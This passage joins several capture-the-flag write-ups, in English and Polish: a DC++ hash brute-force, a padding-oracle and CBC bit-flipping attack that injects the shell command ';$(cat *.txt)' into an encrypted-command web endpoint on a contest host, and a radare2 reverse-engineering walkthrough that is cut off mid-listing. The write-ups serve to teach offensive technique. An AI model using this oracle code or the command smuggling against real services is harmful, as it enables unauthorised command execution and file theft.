transferowane strumienie zlib): ```xml <FileListing Version="1" CID="IW27TT3CMX5NKVCSVJ2CFJYSVUUC6CB43FF3XLA" Base="/" Generator="EiskaltDC++ 2.2.9"><Directory Name="cadence"></Directory><Directory Name="DSP"></Directory><Directory Name="DC"> <File Name="DEFCON 19 - The Art of Trolling (w speaker)-AHqGV5WjS4w.mp4" Size="98273830" TTH="KEVJ3EBNSE6XXLTPVCB5WUDMS5KR7P32MJQCGWY"/> <File Name="Fallen Kingdom - The Complete Minecraft Music Video Series-ayl3UXKpH1g.mp4" Size="511422768" TTH="M5PWQCU5AUV5L4A367BLGWWAYD5U3NUAVDTDQMI"/> <File Name="fl3g.txt" Size="14" TTH="CA4CMF34SHRUQIBG6MNRDAI5BVT7HQQRTGC7TBA"/> <File Name="Man punches a kangaroo in the face to rescue his dog (Original HD)-FIRT7lf8byw.mkv" Size="69864590" TTH="SOQ7ECDJ6YWM5F5Z3XLXGOFM6J23FOKNKWW5PXY"/> <File Name="poster.jpeg" Size="89139" TTH="IPLZJ2E4VJC4Q5X5NQ5D43COFAU3CGSZ5NQWJVA"/> <File Name="small2.jpg" Size="669170" TTH="K53V57ZPPJUOT5CAUP6DM3BAZI4YMUU536OYD3Q"/> <File Name="This Week in Stupid (04_12_2016)-m8LJl98_H60.mkv" Size="252235314" TTH="56UJJZ32LDK7V7QR5PZKPT7N2VOKPCY6WBZX3JA"/> <File Name="TRUMP UP THE JAMS! - The Fallout of the 2016 Election-jPLQh70GNrA.mkv" Size="274708751" TTH="YXPU6LCXAH5AY6I63KTJ4I3Q36YMZEXYEPGS6MQ"/> <File Name="when leftists attack - SJWs confront man over MAGA shirt-l4L-fk1dWhs.mp4" Size="122011301" TTH="B3W7EZGS2VMUG6B773WCQKPQ24G77R2EDDASJII"/></Directory></FileListing>``` oraz ```xml <FileListing Version="1" CID="AH3KWVYA5DAWJA7HAVHXC6BCLPNG34PVQVMPXPY" Base="/" Generator="EiskaltDC++ 2.2.9"><Directory Name="dcpp"> <File Name="text" Size="14" TTH="CA4CMF34SHRUQIBG6MNRDAI5BVT7HQQRTGC7TBA"/></Directory></FileListing>``` Możemy zauważyć że rozmiar pliku z flagą to 14 bajtów a wiemy że flaga zawiera `BITSCTF{}` więc brakuje nam jedynie 5 bajtów.Szczęśliwie admin wspomniał że plik kończy się znakiem `\n` więc brakuje już tylko 4 bajtów!A znamy hash pliku, więc możemy brutować jego zawartość. Mieliśmy trochę problemów ze znalezieniem kodu do tego zadania ponieważ różne narzędzia/biblioteki dawały różne wyniki hasha. Koniec końcówk znaleźliśmy narzędzie http://directory.fsf.org/wiki/Tthsum które dawało dobre wyniki. Użyliśmy ramdisku żeby tworzyć tymczasowe pliku z potencjalnymi flagami i testowaliśmy czy wynikowe hashe pasują do pliku z flagą i finalnie dostaliśmy `BITSCTF{sw3g}`
# Delphi (web/crypto) ###ENG[PL](#pl-version) The task was in `web` category, but actually there was almost no `web` there, only `crypto`.We get a web interface in which we can invoke three commands from a select box. The commands are `netstat`, `ps aux`, and `echo "This is a longer string that I want to use to test multiple-block patterns`. We notice that all those commands actually point to the same endpoint `execute`, with different parameters, eg `/execute/5d60992b1d3ac1d561f6cb4149d540ed4f6d549c64b9d39babc58c0f29324312`So we deduce that the command itself probably is somehow encrypted in the hex-string.Since commands have different lengths we can assume that it is most likely block encryption.By calculating `gcd` over payload lengths we have we can see that block size can be at most 16 bytes. If we try to modify the payload we quickly hit `decrypt failure` message.This seems like a nice setup for oracle padding attack, so we import our oracle padding breaker from crypto-commons are try to run it on the payloads.If you're interested in how padding oracle works see our other writeup which describes this more in detail: https://github.com/p4-team/ctf/tree/master/2016-09-16-csaw/neoWe need to prepare oracle function, which will tell us if the decryption failed (presumably because of incorrect padding after decrypt): ```pythonsession = requests.Session() def send(ct): while True: try: url = "http://delphi-status-e606c556.ctf.bsidessf.net/execute/" + ct result = session.get(url) content = result.content return content except: time.sleep(1) def oracle(data): result = send(data) if "decrypt" in result: return False else: return True``` So we simply send the payload and check if there is `decrypt failed` message in the response. With this in place we can now run: ```pythonfrom crypto_commons.symmetrical.symmetrical import oracle_padding_recovery def main(): ct = '21573ed27b7d10267caebd178a68434c66bb31eabdd648cd38f6a34d53656b00' # ps aux? oracle_padding_recovery(ct, oracle, 16, string.printable) main()``` And we manage to recover what we expected -> `ps aux` with PKCS padding.The same goes for `nestat` command, but the most interesting is the last payload because it has more than a single block we can recover.The last command ends up to be: `echo "This is a longer string that I want to use to test multiple-block patterns\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f` Now that we know that we're dealing with CBC encryption, we can use bitflipping to force the payload to decrypt into plaintext of our choosing, at least up to a single block boundary. The idea behind this attack comes directly from how CBC mode works.In CBC encryption the plaintext is XORed with previous ciphertext block before encryption.During decryption the block is first decrypted and then XORed with previous ciphertext block to recover the real plaintext.This means, however, that if we modify a single byte of ciphertext of previous block, we will change corresponding byte of the decrypted plaintext in the next block!Keep in mind this will also mess up the decryption of the changed ciphertext block, but this can't be helped. What we need is to know the ciphertext and corresponding plaintext.Then we know that `pt[i] = decrypt(ct[k][i]) ^ ct[k-1][i]` and we know all those values.So now if we XOR `ct[k-1][i]` with `pt[i]` we should always get 0 as result, since `a xor a = 0`.And now if we XOR this with any value, we will get this value as decryption result! Fortunately we also have this in crypto-commons so we proceed with: ```python ct = '2ca638d01882452ec38895c06cd42505e2b5f680cccd0e4ee9c05acf697bc8fa0f33c4e66d69f81e1869606244dbc1f8f2cce8a05447037fb83addb8a9e6da032c1d08a5598422aab67283a1fcf6ca6297970b2a226124505751ed5d425fd8717d2da1ff5cd6a806c85fdb3ad3cbb175' # echo something pt = ( '?' * 16) + 'echo "This is a longer string that I want to use to test multiple-block patterns\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f' ct = set_cbc_payload_for_block(ct.decode("hex"), pt, ';$(cat *.txt) ', 5).encode("hex") print(ct)``` This way we modify the decryption results for 5th block of the ciphertext.4th block will be broken, but since it's just passed to `echo` we don't really care about it much.So we just modified the ciphertext to decode into `echo ... garbage;$(cat *.txt) ` which invoked in the shell will give us the flag.And if we now go to the `http://delphi-status-e606c556.ctf.bsidessf.net/execute/2ca638d01882452ec38895c06cd42505e2b5f680cccd0e4ee9c05acf697bc8fa0f33c4e66d69f81e1869606244dbc1f8f2cce8a05447037fb83addb8a9e6da03721442aa579369a0e8678fa1b0a4843197970b2a226124505751ed5d425fd8717d2da1ff5cd6a806c85fdb3ad3cbb175` url with our modified ciphertext we get as expected: `This is a longer string that I want to use�?�|��O� |�?�q)�;FLAG:a1cf81c5e0872a7e0a4aec2e8e9f74c3 ` ###PL version Zadanie co prawda było w kategorii `web` ale w praktyce nie było tam prawie nic z `web` a jedynie z `crypto`.Dostajemy webowy interfejs z którego można wykonać trzy komendy używając select boxa. Komendy to `netstat`, `ps aux` oraz `echo "This is a longer string that I want to use to test multiple-block patterns`. Zauważamy szybko że wszytkie komendy prowadzą do tego samego endpointu `execue` z innym parametrem, np.`/execute/5d60992b1d3ac1d561f6cb4149d540ed4f6d549c64b9d39babc58c0f29324312`Zgadujemy, że komenda do wykonania jest zaszyfrowana w tym hex-stringu.Skoro komendy mają różne długości to domyślamy się że mamy do czynienia z szyfrem blokowym.Licząc `gcd` z długości znanych payloadów wynika że blok może mieć najwyżej 16 bajtów długości. Jeśli ręcznie zmodyfikujemy payload to szybko dostajemy komunikat `decrypt failure`.To sugeruje setup dla ataku oracle padding, więc importujemy nasz łamacz z crypto-commons i próbujemy uruchomić go dla posiadanych szyfrogramów.Po szczegóły dotyczące ataku padding oracle odsyłamy do innego writeupa który napisalismy kilka tygodni temu: https://github.com/p4-team/ctf/tree/master/2016-09-16-csaw/neo#pl-versionPotrzebujemy do tego przygotować samą wyrocznie, która powie nam czy deszyfrowanie się powiodło czy nie (zakładamy że niepowodzenie wynika z niepopranego paddingu po deszyfrowaniu): ```pythonsession = requests.Session() def send(ct): while True: try: url = "http://delphi-status-e606c556.ctf.bsidessf.net/execute/" + ct result = session.get(url) content = result.content return content except: time.sleep(1) def oracle(data): result = send(data) if "decrypt" in result: return False else: return True``` Więc po prostu wysyłamy przygotowane dane i sprawdzamy czy w odpowiedzie dostaliśmy wiadomość `decrypt failed`. Możemy teraz uruchomić: ```pythonfrom crypto_commons.symmetrical.symmetrical import oracle_padding_recovery def main(): ct = '21573ed27b7d10267caebd178a68434c66bb31eabdd648cd38f6a34d53656b00' # ps aux? oracle_padding_recovery(ct, oracle, 16, string.printable) main()``` I udaje nam się odzyskać oczekiwaną komendę -> `ps aux` z paddingiem PKCS.Tak samo jest dla payloadu z `netstat` ale najciekawszy jest ostatni szyfrogram, bo pozwala odzyskać więcej niż 1 blok.Ostatnia komenda to: `echo "This is a longer string that I want to use to test multiple-block patterns\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f` Skoro wiemy już że mamy do czynienia z szyfrowaniem w trybie CBC, możemy wykorzystać bitflipping żeby zmodyfikować payload tak, aby deszyfrował się do wybranego przez nas plaintextu, przynajmniej do granicy jednego bloku. Idea stojąca za tym atakiem wynika bezpośrednio z działania trybu CBC.W tym trybie plaintext jest XORowwany z ciphertextem w poprzednim bloku przed szyfrowaniem.Podczas deszyfrowania, po odkodowaniu bloku wynik jest XORowany z ciphertextem poprzedniego bloku w celu odzyskania prawdziwego plaintextu.To oznacza jednak, że możemy zmodyfikować jeden bajt ciphertextu w poprzednim bloku i tym samym zmienić odpowiadający mu bajt odszyfrowanego plaintextu w kolejnym bloku!Warto pamiętać, że zniszczymy w ten sposób odszyfrowaną wartość bloku gdzie zmieniamy ciphertext, ale tego nie da się ominąć. Potrzebujemy znać ciphertext oraz odpowiadający mu plaintext.Wiemy że `pt[i] = decrypt(ct[k][i]) ^ ct[k-1][i]` i znamy też wszystkie te wartości.Teraz jeśli XORujemy `ct[k-1][i]` z `pt[i]` powinniśmy zawsze po odszyfrowaniu dostać 0 ponieważ `a xor a = 0`.A teraz jeśli XORujemy to z dowolną inną wartością to uzyskamy tą wartość w wyniku deszyfrowania! Szczęśliwie mamy to już zaimplementowane w crypto-commons więc wykonujemy: ```python ct = '2ca638d01882452ec38895c06cd42505e2b5f680cccd0e4ee9c05acf697bc8fa0f33c4e66d69f81e1869606244dbc1f8f2cce8a05447037fb83addb8a9e6da032c1d08a5598422aab67283a1fcf6ca6297970b2a226124505751ed5d425fd8717d2da1ff5cd6a806c85fdb3ad3cbb175' # echo something pt = ( '?' * 16) + 'echo "This is a longer string that I want to use to test multiple-block patterns\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f' ct = set_cbc_payload_for_block(ct.decode("hex"), pt, ';$(cat *.txt) ', 5).encode("hex") print(ct)``` W ten sposób zmieniamy wynik deszyfrowania 5 bloku.4 blok będzie popsuty, ale jest to input dla `echo` więc nie przejmuejmy się tym specjalnie.Teraz nasz zmieniony ciphertext powinien zdeszyfrować się do czegoś w postaci `echo ... garbage;$(cat *.txt) ` co wykonane w shellu da nam flagę.I faktycznie wchodząc pod URL `http://delphi-status-e606c556.ctf.bsidessf.net/execute/2ca638d01882452ec38895c06cd42505e2b5f680cccd0e4ee9c05acf697bc8fa0f33c4e66d69f81e1869606244dbc1f8f2cce8a05447037fb83addb8a9e6da03721442aa579369a0e8678fa1b0a4843197970b2a226124505751ed5d425fd8717d2da1ff5cd6a806c85fdb3ad3cbb175` url ze zmienionym ciphertextem dostajemy: `This is a longer string that I want to use�?�|��O� |�?�q)�;FLAG:a1cf81c5e0872a7e0a4aec2e8e9f74c3 `
# RE3: Catalyst system (150 points) ## Hint: CEO of catalyst systems decided to build his own log in system from scratch, he thought that it is so safe that no one can fool around with him! ### SolutionThe first thing that we noticed was that this binary was taking too long to execute.There was a loop where sleep was called with a random variable so I nop-ed out the calls to sleep and continued from there.The sequence, with the nops, is shown below. As a reminder, you can hot patch a binary in R2 by opening it in write mode `r2 -w program`, or reopening it with the command `oo+`.Then you can either seek `s` to the location and insert with `wx`. Or if you are in visual mode, enable the cursor by typing `c`, hit `i`, and type in 9090909090. ```│ ┌─< 0x00400e65 eb3e jmp 0x400ea5│ ┌──> 0x00400e67 e804f9ffff call sym.imp.rand ; int rand(void)│ |│ 0x00400e6c 89c6 mov esi, eax│ |│ 0x00400e6e 8b55fc mov edx, dword [rbp - local_4h]│ |│ 0x00400e71 89d0 mov eax, edx│ |│ 0x00400e73 01c0 add eax, eax│ |│ 0x00400e75 01d0 add eax, edx│ |│ 0x00400e77 8d4801 lea ecx, dword [rax + 1] ; 0x1│ |│ 0x00400e7a 89f0 mov eax, esi│ |│ 0x00400e7c 99 cdq│ |│ 0x00400e7d f7f9 idiv ecx│ |│ 0x00400e7f 89d0 mov eax, edx│ |│ 0x00400e81 89c7 mov edi, eax│ |│ 0x00400e83 90 nop│ |│ 0x00400e84 90 nop│ |│ 0x00400e85 90 nop│ |│ 0x00400e86 90 nop│ |│ 0x00400e87 90 nop│ |│ 0x00400e88 bf2e000000 mov edi, 0x2e ; '.' ; int c│ |│ 0x00400e8d e82ef8ffff call sym.imp.putchar ; int putchar(int c)│ |│ 0x00400e92 488b052f1220. mov rax, qword [obj.stdout] ; [0x6020c8:8]=0x4e4728203a434347 ; LEA obj.stdout ; "GCC: (GNU) 6.1.1 20160721 (Red Hat 6.1.1-4)" @ 0x6020c8│ |│ 0x00400e99 4889c7 mov rdi, rax ; FILE *stream│ |│ 0x00400e9c e88ff8ffff call sym.imp.fflush ; int fflush(FILE *stream)│ |│ 0x00400ea1 8345fc01 add dword [rbp - local_4h], 1│ ↑│ ; JMP XREF from 0x00400e65 (main)│ |└─> 0x00400ea5 837dfc1d cmp dword [rbp - local_4h], 0x1d ; [0x1d:4]=0x40000000│ └──< 0x00400ea9 7ebc jle 0x400e67``` I knew that the username was saved in main as [rbp-local_10h] and the password was at [rbp-local_18h]. ```│ 0x00400eb5 bfb8184000 mov edi, str.Username: ; "Username: " @ 0x4018b8 ; const char * format│ 0x00400eba b800000000 mov eax, 0│ 0x00400ebf e82cf8ffff call sym.imp.printf ; int printf(const char *format)│ 0x00400ec4 488b45f0 mov rax, qword [rbp - local_10h]│ 0x00400ec8 4889c6 mov rsi, rax│ 0x00400ecb bfc3184000 mov edi, 0x4018c3 ; const char * format│ 0x00400ed0 b800000000 mov eax, 0│ 0x00400ed5 e866f8ffff call sym.imp.__isoc99_scanf; int scanf(const char *format)│ 0x00400eda bfc6184000 mov edi, str.Password: ; "Password: " @ 0x4018c6 ; const char * format│ 0x00400edf b800000000 mov eax, 0│ 0x00400ee4 e807f8ffff call sym.imp.printf ; int printf(const char *format)│ 0x00400ee9 488b45e8 mov rax, qword [rbp - local_18h]│ 0x00400eed 4889c6 mov rsi, rax│ 0x00400ef0 bfc3184000 mov edi, 0x4018c3 ; const char * format│ 0x00400ef5 b800000000 mov eax, 0│ 0x00400efa e841f8ffff call sym.imp.__isoc99_scanf; int scanf(const char *format)``` You can change the variable names in R2 using the following commands to make reversing easier. ```afvn local_18h passwordafvn local_10h username``` There was another loop with sleep, I nopped that out as well. In the end of main, we have the following sequence of calls. ```│ 0x00400f6e 488b45f0 mov rax, qword [rbp - username]│ 0x00400f72 4889c7 mov rdi, rax│ 0x00400f75 e820fdffff call fcn.00400c9a│ 0x00400f7a 488b45f0 mov rax, qword [rbp - username]│ 0x00400f7e 4889c7 mov rdi, rax ; const char * s│ 0x00400f81 e857fdffff call sub.puts_cdd ; int puts(const char *s)│ 0x00400f86 488b45f0 mov rax, qword [rbp - username]│ 0x00400f8a 4889c7 mov rdi, rax ; const char * s│ 0x00400f8d e865f9ffff call sub.puts_8f7 ; int puts(const char *s)│ 0x00400f92 488b55e8 mov rdx, qword [rbp - password]│ 0x00400f96 488b45f0 mov rax, qword [rbp - username]│ 0x00400f9a 4889d6 mov rsi, rdx│ 0x00400f9d 4889c7 mov rdi, rax ; const char * s│ 0x00400fa0 e8d2f9ffff call sub.puts_977 ; int puts(const char *s)│ 0x00400fa5 488b55e8 mov rdx, qword [rbp - password]│ 0x00400fa9 488b45f0 mov rax, qword [rbp - username]│ 0x00400fad 4889d6 mov rsi, rdx│ 0x00400fb0 4889c7 mov rdi, rax ; const char * format│ 0x00400fb3 e8bef8ffff call sub.printf_876 ; int printf(const char *format)│ 0x00400fb8 b800000000 mov eax, 0│ 0x00400fbd c9 leave└ 0x00400fbe c3 ret``` Lets look at these these functions one by one. The first one takes the username as an argument. ```[0x00400d93]> pdf @ fcn.00400c9a ┌ (fcn) fcn.00400c9a 67│ fcn.00400c9a (int arg_31h);│ ; var int local_18h @ rbp-0x18│ ; var int local_4h @ rbp-0x4│ ; arg int arg_31h @ rbp+0x31│ ; CALL XREF from 0x00400f75 (main)│ 0x00400c9a 55 push rbp│ 0x00400c9b 4889e5 mov rbp, rsp│ 0x00400c9e 4883ec20 sub rsp, 0x20│ 0x00400ca2 48897de8 mov qword [rbp - local_18h], rdi│ 0x00400ca6 c745fc000000. mov dword [rbp - local_4h], 0│ ┌─< 0x00400cad eb18 jmp 0x400cc7│ ┌──> 0x00400caf 8b45fc mov eax, dword [rbp - local_4h]│ |│ 0x00400cb2 4863d0 movsxd rdx, eax│ |│ 0x00400cb5 488b45e8 mov rax, qword [rbp - local_18h]│ |│ 0x00400cb9 4801d0 add rax, rdx ; '('│ |│ 0x00400cbc 0fb600 movzx eax, byte [rax]│ |│ 0x00400cbf 84c0 test al, al│ ┌───< 0x00400cc1 740c je 0x400ccf│ │|│ 0x00400cc3 8345fc01 add dword [rbp - local_4h], 1│ │↑│ ; JMP XREF from 0x00400cad (fcn.00400c9a)│ │|└─> 0x00400cc7 837dfc31 cmp dword [rbp - local_4h], 0x31 ; [0x31:4]=0x40000000 ; '1'│ │└──< 0x00400ccb 7ee2 jle 0x400caf│ │ ┌─< 0x00400ccd eb01 jmp 0x400cd0│ └───> 0x00400ccf 90 nop│ │ ; JMP XREF from 0x00400ccd (fcn.00400c9a)│ └─> 0x00400cd0 8b45fc mov eax, dword [rbp - local_4h]│ 0x00400cd3 89c7 mov edi, eax ; const char * s│ 0x00400cd5 e867ffffff call sub.puts_c41 ; int puts(const char *s)│ 0x00400cda 90 nop│ 0x00400cdb c9 leave└ 0x00400cdc c3 ret```The first function was basically strlen() as it kept a counter of chars in the username that aren't equal to 0.Once that loop was done, it called 'sub.puts_c41' shown below. ```[0x00400d93]> pdf @ sub.puts_c41 ┌ (fcn) sub.puts_c41 89│ sub.puts_c41 ();│ ; var int local_14h @ rbp-0x14│ ; var int local_8h @ rbp-0x8│ ; var int local_4h @ rbp-0x4│ ; var int local_0h @ rbp-0x0│ ; CALL XREF from 0x00400cd5 (fcn.00400c9a)│ 0x00400c41 55 push rbp│ 0x00400c42 4889e5 mov rbp, rsp│ 0x00400c45 4883ec20 sub rsp, 0x20│ 0x00400c49 897dec mov dword [rbp - local_14h], edi│ 0x00400c4c 8b45ec mov eax, dword [rbp - local_14h]│ 0x00400c4f c1f802 sar eax, 2│ 0x00400c52 8945fc mov dword [rbp - local_4h], eax│ 0x00400c55 8b45fc mov eax, dword [rbp - local_4h]│ 0x00400c58 c1e002 shl eax, 2│ 0x00400c5b 3b45ec cmp eax, dword [rbp - local_14h]│ ┌─< 0x00400c5e 7523 jne 0x400c83│ │ 0x00400c60 8b45fc mov eax, dword [rbp - local_4h]│ │ 0x00400c63 c1f802 sar eax, 2│ │ 0x00400c66 8945f8 mov dword [rbp - local_8h], eax│ │ 0x00400c69 8b45f8 mov eax, dword [rbp - local_8h]│ │ 0x00400c6c c1e002 shl eax, 2│ │ 0x00400c6f 3b45fc cmp eax, dword [rbp - local_4h]│ ┌──< 0x00400c72 740f je 0x400c83│ ││ 0x00400c74 8b45fc mov eax, dword [rbp - local_4h]│ ││ 0x00400c77 d1f8 sar eax, 1│ ││ 0x00400c79 85c0 test eax, eax│ ┌───< 0x00400c7b 7406 je 0x400c83│ │││ 0x00400c7d 837df800 cmp dword [rbp - local_8h], 0│ ┌────< 0x00400c81 7414 je 0x400c97│ │└└└─> 0x00400c83 bf69104000 mov edi, str.invalid_username_or_password ; "invalid username or password" @ 0x401069 ; const char * s│ │ 0x00400c88 e843faffff call sym.imp.puts ; int puts(const char *s)│ │ 0x00400c8d bf00000000 mov edi, 0 ; int status│ │ 0x00400c92 e8b9faffff call sym.imp.exit ; void exit(int status)│ └────> 0x00400c97 90 nop│ 0x00400c98 c9 leave└ 0x00400c99 c3 ret```Huh, there is a sequence of bit shifts and checks to figure out if the length of the username was valid.I decided to not bother dealing with the math for now as there was another function later being called that had the username as an argument. I nopped out the call to this functin to skip it for now. And function sub.puts_cdd, which actually did check out the username, is listed below: ```[0x00400d93]> pdf @ sub.puts_cdd ┌ (fcn) sub.puts_cdd 182│ sub.puts_cdd ();│ ; var int local_28h @ rbp-0x28│ ; var int local_20h @ rbp-0x20│ ; var int local_18h @ rbp-0x18│ ; var int local_10h @ rbp-0x10│ ; var int local_8h @ rbp-0x8│ ; CALL XREF from 0x00400f81 (main)│ 0x00400cdd 55 push rbp│ 0x00400cde 4889e5 mov rbp, rsp│ 0x00400ce1 4883ec30 sub rsp, 0x30 ; '0'│ 0x00400ce5 48897dd8 mov qword [rbp - local_28h], rdi│ 0x00400ce9 488b45d8 mov rax, qword [rbp - local_28h]│ 0x00400ced 488945f8 mov qword [rbp - local_8h], rax│ 0x00400cf1 488b45f8 mov rax, qword [rbp - local_8h]│ 0x00400cf5 8b00 mov eax, dword [rax]│ 0x00400cf7 89c0 mov eax, eax│ 0x00400cf9 488945f0 mov qword [rbp - local_10h], rax│ 0x00400cfd 488b45f8 mov rax, qword [rbp - local_8h]│ 0x00400d01 4883c004 add rax, 4│ 0x00400d05 8b00 mov eax, dword [rax]│ 0x00400d07 89c0 mov eax, eax│ 0x00400d09 488945e8 mov qword [rbp - local_18h], rax│ 0x00400d0d 488b45f8 mov rax, qword [rbp - local_8h]│ 0x00400d11 4883c008 add rax, 8│ 0x00400d15 8b00 mov eax, dword [rax]│ 0x00400d17 89c0 mov eax, eax│ 0x00400d19 488945e0 mov qword [rbp - local_20h], rax│ 0x00400d1d 488b45f0 mov rax, qword [rbp - local_10h]│ 0x00400d21 482b45e8 sub rax, qword [rbp - local_18h]│ 0x00400d25 4889c2 mov rdx, rax│ 0x00400d28 488b45e0 mov rax, qword [rbp - local_20h]│ 0x00400d2c 4801d0 add rax, rdx ; '('│ 0x00400d2f 483d564b665c cmp rax, 0x5c664b56│ ┌─< 0x00400d35 7545 jne 0x400d7c│ │ 0x00400d37 488b55f0 mov rdx, qword [rbp - local_10h]│ │ 0x00400d3b 488b45e0 mov rax, qword [rbp - local_20h]│ │ 0x00400d3f 4801c2 add rdx, rax ; '#'│ │ 0x00400d42 4889d0 mov rax, rdx│ │ 0x00400d45 4801c0 add rax, rax ; '#'│ │ 0x00400d48 4801c2 add rdx, rax ; '#'│ │ 0x00400d4b 488b45e8 mov rax, qword [rbp - local_18h]│ │ 0x00400d4f 4801c2 add rdx, rax ; '#'│ │ 0x00400d52 48b8b2c700e7. movabs rax, 0x2e700c7b2│ │ 0x00400d5c 4839c2 cmp rdx, rax│ ┌──< 0x00400d5f 751b jne 0x400d7c│ ││ 0x00400d61 488b45e8 mov rax, qword [rbp - local_18h]│ ││ 0x00400d65 480faf45e0 imul rax, qword [rbp - local_20h]│ ││ 0x00400d6a 4889c2 mov rdx, rax│ ││ 0x00400d6d 48b814d36a9a. movabs rax, 0x32ac30689a6ad314│ ││ 0x00400d77 4839c2 cmp rdx, rax│ ┌───< 0x00400d7a 7414 je 0x400d90│ │└└─> 0x00400d7c bf69104000 mov edi, str.invalid_username_or_password ; "invalid username or password" @ 0x401069 ; const char * s│ │ 0x00400d81 e84af9ffff call sym.imp.puts ; int puts(const char *s)│ │ 0x00400d86 bf00000000 mov edi, 0 ; int status│ │ 0x00400d8b e8c0f9ffff call sym.imp.exit ; void exit(int status)│ └───> 0x00400d90 90 nop│ 0x00400d91 c9 leave└ 0x00400d92 c3 ret```Following the logic this function appears to be checking the username by running some math operations against small chunks of the username, then comparing against certain constants. We can reverse the operations by using the following algebra. We know that the constants are: 0x5c664b56, 0x2e700c7b2, and 0x32ac30689a6ad314. To solve for them, we followed the logic and found the following equations.* x - y + z = 0x5c664b56* 3(x+z) + y = 0x2e700c7b2* y * z = 0x32ac30689a6ad314 Where x = user[0:3], y = [4:7], and z = user[8:11] for the 12 character password we got.Solving for the equations we got: x = "atac", y = "tsyl", z = "oec_".Accounting for endianness, the username was found to be: "catalyst_ceo". I verified this by running gdb and setting a breakpoint after those functions to make sure I can pass these checks. Function at 0x4008f7 only checked for formatting of the username, so we can skip that. But if you are curious, I was able to tell that it was simply checking for formatting because it was comparing each character against a range of ASCII values, exiting if the character is out of range. We pass this check already since we know the username. It is listed below for completeness. ```[0x00400d93]> pdf @ sub.puts_8f7┌ (fcn) sub.puts_8f7 128│ sub.puts_8f7 ();│ ; var int local_18h @ rbp-0x18│ ; var int local_4h @ rbp-0x4│ ; CALL XREF from 0x00400f8d (main)│ 0x004008f7 55 push rbp│ 0x004008f8 4889e5 mov rbp, rsp│ 0x004008fb 4883ec20 sub rsp, 0x20│ 0x004008ff 48897de8 mov qword [rbp - local_18h], rdi│ 0x00400903 c745fc000000. mov dword [rbp - local_4h], 0│ ┌─< 0x0040090a eb54 jmp 0x400960│ ┌──> 0x0040090c 8b45fc mov eax, dword [rbp - local_4h]│ |│ 0x0040090f 4863d0 movsxd rdx, eax│ |│ 0x00400912 488b45e8 mov rax, qword [rbp - local_18h]│ |│ 0x00400916 4801d0 add rax, rdx ; '('│ |│ 0x00400919 0fb600 movzx eax, byte [rax]│ |│ 0x0040091c 3c60 cmp al, 0x60 ; '`' ; '`'│ ┌───< 0x0040091e 7e14 jle 0x400934│ │|│ 0x00400920 8b45fc mov eax, dword [rbp - local_4h]│ │|│ 0x00400923 4863d0 movsxd rdx, eax│ │|│ 0x00400926 488b45e8 mov rax, qword [rbp - local_18h]│ │|│ 0x0040092a 4801d0 add rax, rdx ; '('│ │|│ 0x0040092d 0fb600 movzx eax, byte [rax]│ │|│ 0x00400930 3c7a cmp al, 0x7a ; 'z' ; 'z'│ ┌────< 0x00400932 7e28 jle 0x40095c│ │└───> 0x00400934 8b45fc mov eax, dword [rbp - local_4h]│ │ |│ 0x00400937 4863d0 movsxd rdx, eax│ │ |│ 0x0040093a 488b45e8 mov rax, qword [rbp - local_18h]│ │ |│ 0x0040093e 4801d0 add rax, rdx ; '('│ │ |│ 0x00400941 0fb600 movzx eax, byte [rax]│ │ |│ 0x00400944 3c5f cmp al, 0x5f ; '_' ; '_'│ │┌───< 0x00400946 7414 je 0x40095c│ ││|│ 0x00400948 bf69104000 mov edi, str.invalid_username_or_password ; "invalid username or password" @ 0x401069 ; const char * s│ ││|│ 0x0040094d e87efdffff call sym.imp.puts ; int puts(const char *s)│ ││|│ 0x00400952 bf00000000 mov edi, 0 ; int status│ ││|│ 0x00400957 e8f4fdffff call sym.imp.exit ; void exit(int status)│ └└───> 0x0040095c 8345fc01 add dword [rbp - local_4h], 1│ ↑│ ; JMP XREF from 0x0040090a (sub.puts_8f7)│ |└─> 0x00400960 8b45fc mov eax, dword [rbp - local_4h]│ | 0x00400963 4863d0 movsxd rdx, eax│ | 0x00400966 488b45e8 mov rax, qword [rbp - local_18h]│ | 0x0040096a 4801d0 add rax, rdx ; '('│ | 0x0040096d 0fb600 movzx eax, byte [rax]│ | 0x00400970 84c0 test al, al│ └──< 0x00400972 7598 jne 0x40090c│ 0x00400974 90 nop│ 0x00400975 c9 leave└ 0x00400976 c3 ret``` On to the next function. This one actually takes the password variable. ```[0x00400d93]> pdf @ sub.puts_977┌ (fcn) sub.puts_977 714│ sub.puts_977 ();│ ; var int local_40h @ rbp-0x40│ ; var int local_38h @ rbp-0x38│ ; var int local_28h @ rbp-0x28│ ; var int local_20h @ rbp-0x20│ ; var int local_14h @ rbp-0x14│ ; CALL XREF from 0x00400fa0 (main)│ 0x00400977 55 push rbp│ 0x00400978 4889e5 mov rbp, rsp│ 0x0040097b 53 push rbx│ 0x0040097c 4883ec38 sub rsp, 0x38 ; '8'│ 0x00400980 48897dc8 mov qword [rbp - local_38h], rdi│ 0x00400984 488975c0 mov qword [rbp - local_40h], rsi│ 0x00400988 488b45c8 mov rax, qword [rbp - local_38h]│ 0x0040098c 488945e0 mov qword [rbp - local_20h], rax│ 0x00400990 488b45c0 mov rax, qword [rbp - local_40h]│ 0x00400994 488945d8 mov qword [rbp - local_28h], rax│ 0x00400998 c745ec000000. mov dword [rbp - local_14h], 0│ ┌─< 0x0040099f e990000000 jmp 0x400a34│ ┌──> 0x004009a4 8b45ec mov eax, dword [rbp - local_14h]│ |│ 0x004009a7 4863d0 movsxd rdx, eax│ |│ 0x004009aa 488b45c0 mov rax, qword [rbp - local_40h]│ |│ 0x004009ae 4801d0 add rax, rdx ; '('│ |│ 0x004009b1 0fb600 movzx eax, byte [rax]│ |│ 0x004009b4 3c60 cmp al, 0x60 ; '`' ; '`'│ ┌───< 0x004009b6 7e14 jle 0x4009cc│ │|│ 0x004009b8 8b45ec mov eax, dword [rbp - local_14h]│ │|│ 0x004009bb 4863d0 movsxd rdx, eax│ │|│ 0x004009be 488b45c0 mov rax, qword [rbp - local_40h]│ │|│ 0x004009c2 4801d0 add rax, rdx ; '('│ │|│ 0x004009c5 0fb600 movzx eax, byte [rax]│ │|│ 0x004009c8 3c7a cmp al, 0x7a ; 'z' ; 